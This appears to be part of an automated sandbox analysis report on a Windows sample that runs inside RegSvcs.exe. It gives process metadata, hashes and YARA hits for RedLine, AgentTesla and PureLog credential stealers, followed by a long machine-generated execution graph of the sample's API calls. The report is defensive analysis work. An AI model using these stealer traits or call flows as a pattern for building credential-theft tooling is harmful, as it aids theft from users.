                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\juE8dtqPkx.exe"
                                                  Imagebase:0x400000
                                                  File size:973'026 bytes
                                                  MD5 hash:BD28F9A835C67CE45B3A3CA02F6737A2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.2197062876.00000000016A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:01:01:41
                                                  Start date:11/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\juE8dtqPkx.exe"
                                                  Imagebase:0xac0000
                                                  File size:45'984 bytes
                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4674158790.0000000003152000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4674158790.0000000003152000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000004.00000002.4676914984.00000000054A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.4657745464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.4676035615.0000000004121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.4673435255.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000004.00000002.4673937156.00000000030A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:high
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:3.5%
                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                    Signature Coverage:4.7%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:37
                                                    execution_graph 86222 4010e0 86225 401100 86222->86225 86224 4010f8 86226 401113 86225->86226 86228 401120 86226->86228 86229 401184 86226->86229 86230 40114c 86226->86230 86261 401182 86226->86261 86227 40112c DefWindowProcW 86227->86224 86228->86227 86270 401000 Shell_NotifyIconW setSBCS 86228->86270 86263 401250 61 API calls setSBCS 86229->86263 86232 401151 86230->86232 86233 40119d 86230->86233 86237 401219 86232->86237 86238 40115d 86232->86238 86235 4011a3 86233->86235 86236 42afb4 86233->86236 86234 401193 86234->86224 86235->86228 86247 4011b6 KillTimer 86235->86247 86248 4011db SetTimer RegisterWindowMessageW 86235->86248 86265 40f190 10 API calls 86236->86265 86237->86228 86241 401225 86237->86241 86239 401163 86238->86239 86240 42b01d 86238->86240 86244 42afe9 86239->86244 86245 40116c 86239->86245 86240->86227 86269 4370f4 52 API calls 86240->86269 86272 468b0e 74 API calls setSBCS 86241->86272 86267 40f190 10 API calls 86244->86267 86245->86228 86250 401174 86245->86250 86246 42b04f 86271 40e0c0 74 API calls setSBCS 86246->86271 86264 401000 Shell_NotifyIconW setSBCS 86247->86264 86248->86234 86255 401204 CreatePopupMenu 86248->86255 86266 45fd57 65 API calls setSBCS 86250->86266 86255->86224 86256 42b00e 86268 401a50 381 API calls 86256->86268 86257 4011c9 PostQuitMessage 86257->86224 86260 42afdc 86260->86227 86262 42afe4 86260->86262 86261->86227 86262->86234 86263->86234 86264->86257 86265->86234 86266->86260 86267->86256 86268->86261 86269->86261 86270->86246 86271->86261 86272->86262 86273 40bd20 86274 428194 86273->86274 86281 40bd2d 86273->86281 86275 40bd43 86274->86275 86277 4281bc 86274->86277 86279 4281b2 86274->86279 86295 45e987 86 API calls moneypunct 86277->86295 86294 40b510 VariantClear 86279->86294 86282 40bd37 86281->86282 86296 4531b1 85 API calls 5 library calls 86281->86296 86285 40bd50 86282->86285 86284 4281ba 86286 426cf1 86285->86286 86287 40bd63 86285->86287 86306 44cde9 52 API calls _memmove 86286->86306 86297 40bd80 86287->86297 86290 426cfc 86307 40e0a0 86290->86307 86291 40bd73 86291->86275 86293 426d02 86294->86284 86295->86281 86296->86282 86298 40bdb7 _memmove 86297->86298 86299 40bd8e 86297->86299 86298->86291 86299->86298 86300 40bded 86299->86300 86301 40bdad 86299->86301 86317 4115d7 86300->86317 86311 402f00 86301->86311 86305 4115d7 52 API calls 86305->86298 86306->86290 86308 40e0b2 86307->86308 86309 40e0a8 86307->86309 86308->86293 86351 403c30 52 API calls _memmove 86309->86351 86312 402f10 86311->86312 86313 402f0c 86311->86313 86314 4115d7 52 API calls 86312->86314 86315 4268c3 86312->86315 86313->86298 86316 402f51 moneypunct _memmove 86314->86316 86316->86298 86320 4115e1 _malloc 86317->86320 86319 40bdf6 86319->86298 86319->86305 86320->86319 86323 4115fd std::exception::exception 86320->86323 86328 4135bb 86320->86328 86321 41163b 86343 4180af 46 API calls std::exception::operator= 86321->86343 86323->86321 86342 41130a 51 API calls __cinit 86323->86342 86324 411645 86344 418105 RaiseException 86324->86344 86327 411656 86329 413638 _malloc 86328->86329 86332 4135c9 _malloc 86328->86332 86350 417f77 46 API calls __getptd_noexit 86329->86350 86330 4135d4 86330->86332 86345 418901 46 API calls 2 library calls 86330->86345 86346 418752 46 API calls 9 library calls 86330->86346 86347 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86330->86347 86332->86330 86334 4135f7 RtlAllocateHeap 86332->86334 86337 413624 86332->86337 86340 413622 86332->86340 86334->86332 86335 413630 86334->86335 86335->86320 86348 417f77 46 API calls __getptd_noexit 86337->86348 86349 417f77 46 API calls __getptd_noexit 86340->86349 86342->86321 86343->86324 86344->86327 86345->86330 86346->86330 86348->86340 86349->86335 86350->86335 86351->86308 86352 425ba2 86357 40e360 86352->86357 86354 425bb4 86373 41130a 51 API calls __cinit 86354->86373 86356 425bbe 86358 4115d7 52 API calls 86357->86358 86359 40e3ec GetModuleFileNameW 86358->86359 86374 413a0e 86359->86374 86361 40e421 _wcsncat 86377 413a9e 86361->86377 86364 4115d7 52 API calls 86365 40e45e _wcscpy 86364->86365 86380 40bc70 86365->86380 86369 40e4a9 86369->86354 86370 40e4a1 _wcscat _wcslen _wcsncpy 86370->86369 86371 4115d7 52 API calls 86370->86371 86372 401c90 52 API calls 86370->86372 86371->86370 86372->86370 86373->86356 86399 413801 86374->86399 86429 419efd 86377->86429 86381 4115d7 52 API calls 86380->86381 86382 40bc98 86381->86382 86383 4115d7 52 API calls 86382->86383 86384 40bca6 86383->86384 86385 40e4c0 86384->86385 86441 403350 86385->86441 86387 40e4cb RegOpenKeyExW 86388 427190 RegQueryValueExW 86387->86388 86389 40e4eb 86387->86389 86390 4271b0 86388->86390 86391 42721a RegCloseKey 86388->86391 86389->86370 86392 4115d7 52 API calls 86390->86392 86391->86370 86393 4271cb 86392->86393 86448 43652f 52 API calls 86393->86448 86395 4271d8 RegQueryValueExW 86396 42720e 86395->86396 86397 4271f7 86395->86397 86396->86391 86449 402160 86397->86449 86400 41389e 86399->86400 86407 41381a 86399->86407 86401 4139e8 86400->86401 86403 413a00 86400->86403 86426 417f77 46 API calls __getptd_noexit 86401->86426 86428 417f77 46 API calls __getptd_noexit 86403->86428 86404 4139ed 86427 417f25 10 API calls __wcsnicmp_l 86404->86427 86407->86400 86412 41388a 86407->86412 86421 419e30 46 API calls __wcsnicmp_l 86407->86421 86409 41396c 86409->86400 86410 413967 86409->86410 86413 41397a 86409->86413 86410->86361 86411 413929 86411->86400 86414 413945 86411->86414 86423 419e30 46 API calls __wcsnicmp_l 86411->86423 86412->86400 86420 413909 86412->86420 86422 419e30 46 API calls __wcsnicmp_l 86412->86422 86425 419e30 46 API calls __wcsnicmp_l 86413->86425 86414->86400 86414->86410 86417 41395b 86414->86417 86424 419e30 46 API calls __wcsnicmp_l 86417->86424 86420->86409 86420->86411 86421->86412 86422->86420 86423->86414 86424->86410 86425->86410 86426->86404 86427->86410 86428->86410 86430 419f13 86429->86430 86431 419f0e 86429->86431 86438 417f77 46 API calls __getptd_noexit 86430->86438 86431->86430 86437 419f2b 86431->86437 86435 40e454 86435->86364 86436 419f18 86439 417f25 10 API calls __wcsnicmp_l 86436->86439 86437->86435 86440 417f77 46 API calls __getptd_noexit 86437->86440 86438->86436 86439->86435 86440->86436 86442 403367 86441->86442 86443 403358 86441->86443 86444 4115d7 52 API calls 86442->86444 86443->86387 86445 403370 86444->86445 86446 4115d7 52 API calls 86445->86446 86447 40339e 86446->86447 86447->86387 86448->86395 86450 426daa 86449->86450 86451 40216b _wcslen 86449->86451 86464 40c600 86450->86464 86454 402180 86451->86454 86455 40219e 86451->86455 86453 426db5 86453->86396 86462 403bd0 52 API calls moneypunct 86454->86462 86463 4013a0 52 API calls 86455->86463 86458 402187 _memmove 86458->86396 86459 4021a5 86460 426db7 86459->86460 86461 4115d7 52 API calls 86459->86461 86461->86458 86462->86458 86463->86459 86465 40c619 86464->86465 86466 40c60a 86464->86466 86465->86453 86466->86465 86469 4026f0 86466->86469 86468 426d7a _memmove 86468->86453 86470 426873 86469->86470 86471 4026ff 86469->86471 86476 4013a0 52 API calls 86470->86476 86471->86468 86473 42687b 86474 4115d7 52 API calls 86473->86474 86475 42689e _memmove 86474->86475 86475->86468 86476->86473 86477 416454 86514 416c70 86477->86514 86479 416460 GetStartupInfoW 86480 416474 86479->86480 86515 419d5a HeapCreate 86480->86515 86482 4164cd 86483 4164d8 86482->86483 86598 41642b 46 API calls 3 library calls 86482->86598 86516 417c20 GetModuleHandleW 86483->86516 86486 4164de 86487 4164e9 __RTC_Initialize 86486->86487 86599 41642b 46 API calls 3 library calls 86486->86599 86535 41aaa1 GetStartupInfoW 86487->86535 86491 416503 GetCommandLineW 86548 41f584 GetEnvironmentStringsW 86491->86548 86494 416513 86554 41f4d6 GetModuleFileNameW 86494->86554 86497 41651d 86498 416528 86497->86498 86601 411924 46 API calls 3 library calls 86497->86601 86558 41f2a4 86498->86558 86501 41652e 86502 416539 86501->86502 86602 411924 46 API calls 3 library calls 86501->86602 86572 411703 86502->86572 86505 416541 86507 41654c __wwincmdln 86505->86507 86603 411924 46 API calls 3 library calls 86505->86603 86576 40d6b0 86507->86576 86510 41657c 86605 411906 46 API calls _doexit 86510->86605 86513 416581 __alloc_osfhnd 86514->86479 86515->86482 86517 417c34 86516->86517 86518 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86516->86518 86606 4178ff 49 API calls _free 86517->86606 86521 417c87 TlsAlloc 86518->86521 86520 417c39 86520->86486 86523 417cd5 TlsSetValue 86521->86523 86524 417d96 86521->86524 86523->86524 86525 417ce6 __init_pointers 86523->86525 86524->86486 86607 418151 InitializeCriticalSectionAndSpinCount 86525->86607 86527 417d91 86615 4178ff 49 API calls _free 86527->86615 86529 417d2a 86529->86527 86608 416b49 86529->86608 86532 417d76 86614 41793c 46 API calls 4 library calls 86532->86614 86534 417d7e GetCurrentThreadId 86534->86524 86536 416b49 __calloc_crt 46 API calls 86535->86536 86547 41aabf 86536->86547 86537 41ac6a GetStdHandle 86542 41ac34 86537->86542 86538 416b49 __calloc_crt 46 API calls 86538->86547 86539 41acce SetHandleCount 86546 4164f7 86539->86546 86540 41ac7c GetFileType 86540->86542 86541 41abb4 86541->86542 86543 41abe0 GetFileType 86541->86543 86544 41abeb InitializeCriticalSectionAndSpinCount 86541->86544 86542->86537 86542->86539 86542->86540 86545 41aca2 InitializeCriticalSectionAndSpinCount 86542->86545 86543->86541 86543->86544 86544->86541 86544->86546 86545->86542 86545->86546 86546->86491 86600 411924 46 API calls 3 library calls 86546->86600 86547->86538 86547->86541 86547->86542 86547->86546 86547->86547 86549 41f595 86548->86549 86550 41f599 86548->86550 86549->86494 86625 416b04 86550->86625 86552 41f5c2 FreeEnvironmentStringsW 86552->86494 86553 41f5bb _memmove 86553->86552 86555 41f50b _wparse_cmdline 86554->86555 86556 416b04 __malloc_crt 46 API calls 86555->86556 86557 41f54e _wparse_cmdline 86555->86557 86556->86557 86557->86497 86559 41f2bc _wcslen 86558->86559 86563 41f2b4 86558->86563 86560 416b49 __calloc_crt 46 API calls 86559->86560 86565 41f2e0 _wcslen 86560->86565 86561 41f336 86632 413748 86561->86632 86563->86501 86564 416b49 __calloc_crt 46 API calls 86564->86565 86565->86561 86565->86563 86565->86564 86566 41f35c 86565->86566 86569 41f373 86565->86569 86631 41ef12 46 API calls __wcsnicmp_l 86565->86631 86567 413748 _free 46 API calls 86566->86567 86567->86563 86638 417ed3 86569->86638 86571 41f37f 86571->86501 86573 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86572->86573 86575 411750 __IsNonwritableInCurrentImage 86573->86575 86657 41130a 51 API calls __cinit 86573->86657 86575->86505 86577 42e2f3 86576->86577 86578 40d6cc 86576->86578 86658 408f40 86578->86658 86580 40d707 86662 40ebb0 86580->86662 86583 40d737 86665 411951 86583->86665 86588 40d751 86677 40f4e0 SystemParametersInfoW SystemParametersInfoW 86588->86677 86590 40d75f 86678 40d590 GetCurrentDirectoryW 86590->86678 86592 40d767 SystemParametersInfoW 86593 40d78d 86592->86593 86594 408f40 VariantClear 86593->86594 86595 40d79d 86594->86595 86596 408f40 VariantClear 86595->86596 86597 40d7a6 86596->86597 86597->86510 86604 4118da 46 API calls _doexit 86597->86604 86598->86483 86599->86487 86604->86510 86605->86513 86606->86520 86607->86529 86610 416b52 86608->86610 86611 416b8f 86610->86611 86612 416b70 Sleep 86610->86612 86616 41f677 86610->86616 86611->86527 86611->86532 86613 416b85 86612->86613 86613->86610 86613->86611 86614->86534 86615->86524 86617 41f683 86616->86617 86623 41f69e _malloc 86616->86623 86618 41f68f 86617->86618 86617->86623 86624 417f77 46 API calls __getptd_noexit 86618->86624 86620 41f6b1 HeapAlloc 86622 41f6d8 86620->86622 86620->86623 86621 41f694 86621->86610 86622->86610 86623->86620 86623->86622 86624->86621 86626 416b0d 86625->86626 86627 4135bb _malloc 45 API calls 86626->86627 86628 416b43 86626->86628 86629 416b24 Sleep 86626->86629 86627->86626 86628->86553 86630 416b39 86629->86630 86630->86626 86630->86628 86631->86565 86633 41377c __dosmaperr 86632->86633 86634 413753 RtlFreeHeap 86632->86634 86633->86563 86634->86633 86635 413768 86634->86635 86641 417f77 46 API calls __getptd_noexit 86635->86641 86637 41376e GetLastError 86637->86633 86642 417daa 86638->86642 86641->86637 86643 417dc9 setSBCS __call_reportfault 86642->86643 86644 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86643->86644 86647 417eb5 __call_reportfault 86644->86647 86646 417ed1 GetCurrentProcess TerminateProcess 86646->86571 86648 41a208 86647->86648 86649 41a210 86648->86649 86650 41a212 IsDebuggerPresent 86648->86650 86649->86646 86656 41fe19 86650->86656 86653 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86654 421ff8 GetCurrentProcess TerminateProcess 86653->86654 86655 421ff0 __call_reportfault 86653->86655 86654->86646 86655->86654 86656->86653 86657->86575 86660 408f48 moneypunct 86658->86660 86659 4265c7 VariantClear 86661 408f55 moneypunct 86659->86661 86660->86659 86660->86661 86661->86580 86718 40ebd0 86662->86718 86722 4182cb 86665->86722 86667 41195e 86729 4181f2 LeaveCriticalSection 86667->86729 86669 40d748 86670 4119b0 86669->86670 86671 4119d6 86670->86671 86672 4119bc 86670->86672 86671->86588 86672->86671 86764 417f77 46 API calls __getptd_noexit 86672->86764 86674 4119c6 86765 417f25 10 API calls __wcsnicmp_l 86674->86765 86676 4119d1 86676->86588 86677->86590 86766 401f20 86678->86766 86680 40d5b6 IsDebuggerPresent 86681 40d5c4 86680->86681 86682 42e1bb MessageBoxA 86680->86682 86683 42e1d4 86681->86683 86684 40d5e3 86681->86684 86682->86683 86939 403a50 52 API calls 3 library calls 86683->86939 86836 40f520 86684->86836 86688 40d5fd GetFullPathNameW 86848 401460 86688->86848 86690 40d63b 86691 40d643 86690->86691 86692 42e231 SetCurrentDirectoryW 86690->86692 86693 40d64c 86691->86693 86940 432fee 6 API calls 86691->86940 86692->86691 86863 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86693->86863 86696 42e252 86696->86693 86698 42e25a GetModuleFileNameW 86696->86698 86700 42e274 86698->86700 86701 42e2cb GetForegroundWindow ShellExecuteW 86698->86701 86941 401b10 86700->86941 86703 40d688 86701->86703 86702 40d656 86705 40d669 86702->86705 86937 40e0c0 74 API calls setSBCS 86702->86937 86710 40d692 SetCurrentDirectoryW 86703->86710 86871 4091e0 86705->86871 86710->86592 86712 42e28d 86948 40d200 52 API calls 2 library calls 86712->86948 86715 42e299 GetForegroundWindow ShellExecuteW 86716 42e2c6 86715->86716 86716->86703 86717 40ec00 LoadLibraryA GetProcAddress 86717->86583 86719 40d72e 86718->86719 86720 40ebd6 LoadLibraryA 86718->86720 86719->86583 86719->86717 86720->86719 86721 40ebe7 GetProcAddress 86720->86721 86721->86719 86723 4182e0 86722->86723 86724 4182f3 EnterCriticalSection 86722->86724 86730 418209 86723->86730 86724->86667 86726 4182e6 86726->86724 86757 411924 46 API calls 3 library calls 86726->86757 86729->86669 86731 418215 __alloc_osfhnd 86730->86731 86732 418225 86731->86732 86733 41823d 86731->86733 86758 418901 46 API calls 2 library calls 86732->86758 86735 416b04 __malloc_crt 45 API calls 86733->86735 86741 41824b __alloc_osfhnd 86733->86741 86737 418256 86735->86737 86736 41822a 86759 418752 46 API calls 9 library calls 86736->86759 86739 41825d 86737->86739 86740 41826c 86737->86740 86761 417f77 46 API calls __getptd_noexit 86739->86761 86744 4182cb __lock 45 API calls 86740->86744 86741->86726 86742 418231 86760 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86742->86760 86746 418273 86744->86746 86748 4182a6 86746->86748 86749 41827b InitializeCriticalSectionAndSpinCount 86746->86749 86750 413748 _free 45 API calls 86748->86750 86751 418297 86749->86751 86752 41828b 86749->86752 86750->86751 86763 4182c2 LeaveCriticalSection _doexit 86751->86763 86753 413748 _free 45 API calls 86752->86753 86755 418291 86753->86755 86762 417f77 46 API calls __getptd_noexit 86755->86762 86758->86736 86759->86742 86761->86741 86762->86751 86763->86741 86764->86674 86765->86676 86949 40e6e0 86766->86949 86770 401f41 GetModuleFileNameW 86967 410100 86770->86967 86772 401f5c 86979 410960 86772->86979 86775 401b10 52 API calls 86776 401f81 86775->86776 86982 401980 86776->86982 86778 401f8e 86779 408f40 VariantClear 86778->86779 86780 401f9d 86779->86780 86781 401b10 52 API calls 86780->86781 86782 401fb4 86781->86782 86783 401980 53 API calls 86782->86783 86784 401fc3 86783->86784 86785 401b10 52 API calls 86784->86785 86786 401fd2 86785->86786 86990 40c2c0 86786->86990 86788 401fe1 86789 40bc70 52 API calls 86788->86789 86790 401ff3 86789->86790 87008 401a10 86790->87008 86792 401ffe 87015 4114ab 86792->87015 86795 428b05 86797 401a10 52 API calls 86795->86797 86796 402017 86798 4114ab __wcsicoll 58 API calls 86796->86798 86799 428b18 86797->86799 86800 402022 86798->86800 86802 401a10 52 API calls 86799->86802 86800->86799 86801 40202d 86800->86801 86803 4114ab __wcsicoll 58 API calls 86801->86803 86804 428b33 86802->86804 86805 402038 86803->86805 86807 428b3b GetModuleFileNameW 86804->86807 86806 402043 86805->86806 86805->86807 86808 4114ab __wcsicoll 58 API calls 86806->86808 86809 401a10 52 API calls 86807->86809 86810 40204e 86808->86810 86811 428b6c 86809->86811 86812 402092 86810->86812 86818 401a10 52 API calls 86810->86818 86821 428b90 _wcscpy 86810->86821 86813 40e0a0 52 API calls 86811->86813 86814 4020a3 86812->86814 86812->86821 86815 428b7a 86813->86815 86817 428bc6 86814->86817 87023 40e830 53 API calls 86814->87023 86816 401a10 52 API calls 86815->86816 86820 428b88 86816->86820 86819 402073 _wcscpy 86818->86819 86826 401a10 52 API calls 86819->86826 86820->86821 86823 401a10 52 API calls 86821->86823 86831 4020d0 86823->86831 86824 4020bb 87024 40cf00 53 API calls 86824->87024 86826->86812 86827 4020c6 86828 408f40 VariantClear 86827->86828 86828->86831 86830 402110 86833 408f40 VariantClear 86830->86833 86831->86830 86834 401a10 52 API calls 86831->86834 87025 40cf00 53 API calls 86831->87025 87026 40e6a0 53 API calls 86831->87026 86835 402120 moneypunct 86833->86835 86834->86831 86835->86680 86837 4295c9 setSBCS 86836->86837 86838 40f53c 86836->86838 86840 4295d9 GetOpenFileNameW 86837->86840 87856 410120 86838->87856 86840->86838 86842 40d5f5 86840->86842 86841 40f545 87860 4102b0 SHGetMalloc 86841->87860 86842->86688 86842->86690 86844 40f54c 87865 410190 GetFullPathNameW 86844->87865 86846 40f559 87876 40f570 86846->87876 87938 402400 86848->87938 86850 40146f 86853 428c29 _wcscat 86850->86853 87947 401500 86850->87947 86852 40147c 86852->86853 87955 40d440 86852->87955 86855 401489 86855->86853 86856 401491 GetFullPathNameW 86855->86856 86857 402160 52 API calls 86856->86857 86858 4014bb 86857->86858 86859 402160 52 API calls 86858->86859 86860 4014c8 86859->86860 86860->86853 86861 402160 52 API calls 86860->86861 86862 4014ee 86861->86862 86862->86690 86864 428361 86863->86864 86865 4103fc LoadImageW RegisterClassExW 86863->86865 88026 44395e EnumResourceNamesW LoadImageW 86864->88026 88025 410490 7 API calls 86865->88025 86868 40d651 86870 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86868->86870 86869 428368 86870->86702 86872 409202 86871->86872 86873 42d7ad 86871->86873 86931 409216 moneypunct 86872->86931 88163 410940 381 API calls 86872->88163 88166 45e737 90 API calls 3 library calls 86873->88166 86876 409386 86877 40939c 86876->86877 88164 40f190 10 API calls 86876->88164 86877->86703 86938 401000 Shell_NotifyIconW setSBCS 86877->86938 86879 4095b2 86879->86877 86881 4095bf 86879->86881 86880 409253 PeekMessageW 86880->86931 88165 401a50 381 API calls 86881->88165 86883 40d410 VariantClear 86883->86931 86884 42d8cd Sleep 86884->86931 86885 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86885->86877 86888 4095f9 86885->86888 86887 42e13b 88184 40d410 VariantClear 86887->88184 86891 42e158 TranslateMessage DispatchMessageW GetMessageW 86888->86891 86891->86891 86893 42e188 86891->86893 86892 409567 PeekMessageW 86892->86931 86893->86877 86896 46f3c1 107 API calls 86896->86931 86897 40e0a0 52 API calls 86897->86931 86898 46fdbf 108 API calls 86935 4094e0 86898->86935 86899 409551 TranslateMessage DispatchMessageW 86899->86892 86901 42dcd2 WaitForSingleObject 86903 42dcf0 GetExitCodeProcess CloseHandle 86901->86903 86901->86931 86902 42dd3d Sleep 86902->86935 88173 40d410 VariantClear 86903->88173 86905 44c29d 52 API calls 86905->86935 86907 4094cf Sleep 86907->86935 86910 42d94d timeGetTime 88169 465124 53 API calls 86910->88169 86912 40c620 timeGetTime 86912->86935 86915 42dd89 CloseHandle 86915->86935 86916 47d33e 359 API calls 86916->86931 86918 465124 53 API calls 86918->86935 86919 42de19 GetExitCodeProcess CloseHandle 86919->86935 86921 401b10 52 API calls 86921->86935 86923 42de88 Sleep 86923->86931 86926 401980 53 API calls 86926->86935 86927 45e737 90 API calls 86927->86931 86930 42e0cc VariantClear 86930->86931 86931->86876 86931->86880 86931->86883 86931->86884 86931->86887 86931->86892 86931->86896 86931->86897 86931->86899 86931->86901 86931->86902 86931->86907 86931->86910 86931->86916 86931->86927 86931->86930 86932 408f40 VariantClear 86931->86932 86931->86935 88027 4091b0 86931->88027 88085 40afa0 86931->88085 88111 408fc0 86931->88111 88146 408cc0 86931->88146 88160 4096a0 381 API calls 4 library calls 86931->88160 88161 40d150 TranslateAcceleratorW 86931->88161 88162 40d170 IsDialogMessageW GetClassLongW 86931->88162 88167 465124 53 API calls 86931->88167 88168 40c620 timeGetTime 86931->88168 88183 40e270 VariantClear moneypunct 86931->88183 86932->86931 86935->86898 86935->86905 86935->86912 86935->86915 86935->86918 86935->86919 86935->86921 86935->86923 86935->86926 86935->86931 86936 408f40 VariantClear 86935->86936 88170 45178a 54 API calls 86935->88170 88171 47d33e 381 API calls 86935->88171 88172 453bc6 54 API calls 86935->88172 88174 40d410 VariantClear 86935->88174 88175 443d19 67 API calls _wcslen 86935->88175 88176 4574b4 VariantClear 86935->88176 88177 403cd0 86935->88177 88181 4731e1 VariantClear 86935->88181 88182 4331a2 6 API calls 86935->88182 86936->86935 86937->86705 86938->86703 86939->86690 86940->86696 86942 401b16 _wcslen 86941->86942 86943 4115d7 52 API calls 86942->86943 86946 401b63 86942->86946 86944 401b4b _memmove 86943->86944 86945 4115d7 52 API calls 86944->86945 86945->86946 86947 40d200 52 API calls 2 library calls 86946->86947 86947->86712 86948->86715 86950 40bc70 52 API calls 86949->86950 86951 401f31 86950->86951 86952 402560 86951->86952 86953 40256d __write_nolock 86952->86953 86954 402160 52 API calls 86953->86954 86956 402593 86954->86956 86966 4025bd 86956->86966 87027 401c90 86956->87027 86957 4026f0 52 API calls 86957->86966 86958 4026a7 86959 401b10 52 API calls 86958->86959 86965 4026db 86958->86965 86961 4026d1 86959->86961 86960 401b10 52 API calls 86960->86966 87031 40d7c0 52 API calls 2 library calls 86961->87031 86963 401c90 52 API calls 86963->86966 86965->86770 86966->86957 86966->86958 86966->86960 86966->86963 87030 40d7c0 52 API calls 2 library calls 86966->87030 87032 40f760 86967->87032 86970 410118 86970->86772 86972 42805d 86973 42806a 86972->86973 87088 431e58 86972->87088 86974 413748 _free 46 API calls 86973->86974 86976 428078 86974->86976 86977 431e58 82 API calls 86976->86977 86978 428084 86977->86978 86978->86772 86980 4115d7 52 API calls 86979->86980 86981 401f74 86980->86981 86981->86775 86983 4019a3 86982->86983 86987 401985 86982->86987 86984 4019b8 86983->86984 86983->86987 87845 403e10 53 API calls 86984->87845 86985 40199f 86985->86778 86987->86985 87844 403e10 53 API calls 86987->87844 86989 4019c4 86989->86778 86991 40c2c7 86990->86991 86992 40c30e 86990->86992 86995 40c2d3 86991->86995 86996 426c79 86991->86996 86993 40c315 86992->86993 86994 426c2b 86992->86994 86997 40c321 86993->86997 86998 426c5a 86993->86998 87000 426c4b 86994->87000 87001 426c2e 86994->87001 87846 403ea0 52 API calls __cinit 86995->87846 